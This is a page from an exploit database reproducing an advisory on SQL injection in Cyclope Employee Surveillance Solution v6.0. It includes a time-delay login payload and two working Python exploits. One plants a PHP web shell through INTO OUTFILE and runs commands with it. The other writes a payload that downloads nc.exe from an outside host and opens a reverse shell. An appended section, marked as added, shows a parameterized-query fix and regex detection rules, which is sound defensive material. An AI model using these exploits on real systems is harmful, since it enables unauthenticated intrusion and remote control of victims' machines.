0day.today - Biggest Exploit Database in the World.
Cyclope Employee Surveillance Solution v6.0 SQL Injection
# Author: loneferret of Offensive Security
# Product: Cyclope Employee Surveillance Solution v6.0
# Version: 6.0
# Vendor Site: http://www.cyclope-series.com/
# Software Download: http://www.cyclope-series.com/download/index.html

# Software description:
# The employee monitoring software developed by Cyclope-Series is specially designed to inform
# and equip management with statistics relating to the productivity of staff within their organization.

# Vulnerability:
# Due to improper input sanitization, many parameters are prone to SQL injection.
# Most importantly, the username parameter in the application's login form.
#
# PoC 1:
# MySql sleep for 5 seconds.
# No Authentication Required.
# Page: /index.php
# Form: login
# Vulnerable Parameter: username
# username: x' or sleep(5) and '1'='1
# password: whatever

# As stated, nothing is checked before passing "username" to MySql.
# This results in MySql sleeping for 5 seconds, and an unsuccessful
# attempt.

# PoC 2:
# Remote Code Execution
# No Authentication Required.
# Page: /index.php
# Form: login
# Vulnerable Parameter: username
# Creates a small php shell in the application's root folder.
# It also has the added bonus of writing the administrator username and password

# Side note:
# This assumes a default installation, which is located in "C:\Program Files\Cyclope\Ni4xLjA=\"
# If you are wondering what "Ni4xLjA=" is, it's the software's version number in Base64 (6.1.0).
# Using Owasp Zap, you can spider the site to find the application's root folder if ever it changes.

----Python Script Simple Backdoor----
#!/usr/bin/python

import urllib, cookielib
import urllib2
import sys

print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"

if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <CMD>"
    print "[*] Ex. : poc.py 127.0.0.1 ipconfig"
    exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]

backdoor = "<?php system($_GET['exe']);?>"

prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')

act = 'auth-login'
pag = 'login'
password = 'hole'

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})

print "[*] Sending evil payload"
resp = opener.open("http://%s:7879/" % rhost, post_params)

print "[*] Triggering backdoor"
cmd = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
page = urllib.urlopen(cmd)

print "[*] Executing command: %s\n" % rcmd
shell = 'http://%s:7879/Ni4xLjA=/cmd.php?exe=%s' % (rhost,rcmd)

try:
    page = urllib.urlopen(shell)
    cmd = page.read()
    print cmd
except:
    print "[-] Oups! Something happened"

---Python Getting Shell---
#!/usr/bin/python

import urllib, cookielib
import urllib2
import sys

print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"

if (len(sys.argv) != 2):
    print "[*] Usage: poc.py <RHOST>"
    exit(0)

rhost = sys.argv[1]

backdoor = '''<?php file_put_contents("nc.exe", file_get_contents("http://172.16.194.163/nc.exe")); shell_exec("nc.exe 172.16.194.163 4444 -e cmd.exe");?>'''

prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')

act = 'auth-login'
pag = 'login'
password = 'hole'

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})

print "[*] Sending evil payload"
try:
    resp = opener.open("http://%s:7879/" % rhost, post_params)
    print "[*] Triggering Shell"
    shell = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
    page = urllib.urlopen(shell)
    cmd = page.read()
except:
    print "[-] Oups! Something happened"

# 0day.today [2024-11-16] #
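The root cause named in the advisory ("nothing is checked before passing username to MySql") and its fix, as an added example that is not part of the original advisory or the vendor's code. It assumes a simplified users table and uses an in-memory SQLite database with a recording stand-in for MySQL's SLEEP(), so the effect of the PoC 1 username is observable without a delay.

```python
import sqlite3

# Username value quoted from PoC 1 on this page.
POC1_USERNAME = "x' or sleep(5) and '1'='1"

def make_db():
    """Constructed stand-in for the application's user table (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    calls = []

    def fake_sleep(seconds):
        # Stand-in for MySQL SLEEP(): record the call, return 0 like MySQL does.
        calls.append(seconds)
        return 0

    db.create_function("sleep", 1, fake_sleep)
    return db, calls

def login_concatenated(db, username, password):
    # Flawed pattern: user input becomes part of the SQL text.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone()[0] > 0

def login_parameterized(db, username, password):
    # Hardened pattern: input is bound as data and never parsed as SQL.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

def attempt(login, username, password):
    """Run one login against a fresh database; return (logged_in, sleep_calls)."""
    db, calls = make_db()
    logged_in = login(db, username, password)
    return logged_in, len(calls)

if __name__ == "__main__":
    print("concatenated :", attempt(login_concatenated, POC1_USERNAME, "whatever"))
    print("parameterized:", attempt(login_parameterized, POC1_USERNAME, "whatever"))
```

With the concatenated query the injected function runs and the login still fails, matching the "unsuccessful attempt" the advisory describes; with bound parameters the same input is only compared as a string.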
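Detection logic for the request shapes both PoCs produce, as an added example that is not part of the original advisory. The request tuples are constructed sample data, the rule names are this example's own, and the payload bodies are replaced by PLACEHOLDER; the form fields (act, pag, username) and the cmd.php?exe= request come from the scripts above.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Rules derived from the two PoCs on this page; rule names are this example's own.
USERNAME_RULES = {
    "quote-breakout": re.compile(r"'\s*(?:or|and)\s+\S", re.I),
    "time-delay": re.compile(r"\bsleep\s*\(", re.I),
    "file-write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
}

def inspect_request(method, url, body=""):
    """Return the sorted list of rule names a single request trips."""
    hits = set()
    parts = urlsplit(url)
    if method == "POST":
        form = parse_qs(body, keep_blank_values=True)
        if form.get("act") == ["auth-login"]:
            for value in form.get("username", []):
                hits.update(n for n, rx in USERNAME_RULES.items() if rx.search(value))
    elif method == "GET" and parts.path.lower().endswith(".php"):
        # A PHP file taking a command-like parameter, as in the PoC's cmd.php?exe=
        if "exe" in parse_qs(parts.query, keep_blank_values=True):
            hits.add("command-parameter")
    return sorted(hits)

def login_post(username, password):
    """Build a constructed login request with the form fields named on the page."""
    form = {"act": "auth-login", "pag": "login",
            "username": username, "password": password}
    return ("POST", "/index.php", urlencode(form))

# Constructed traffic: two benign logins, both PoC shapes, and the follow-up GET.
SAMPLE = [
    login_post("jsmith", "pw"),
    login_post("o'brien", "pw"),
    login_post("x' or sleep(5) and '1'='1", "whatever"),
    login_post("x' or (SELECT 0x20 into outfile 'PLACEHOLDER') and '1'='1", "hole"),
    ("GET", "/Ni4xLjA=/cmd.php?exe=PLACEHOLDER", ""),
]

def scan(requests):
    return [inspect_request(*r) for r in requests]

if __name__ == "__main__":
    for req, hits in zip(SAMPLE, scan(SAMPLE)):
        print(req[0], req[1], hits or "clean")
```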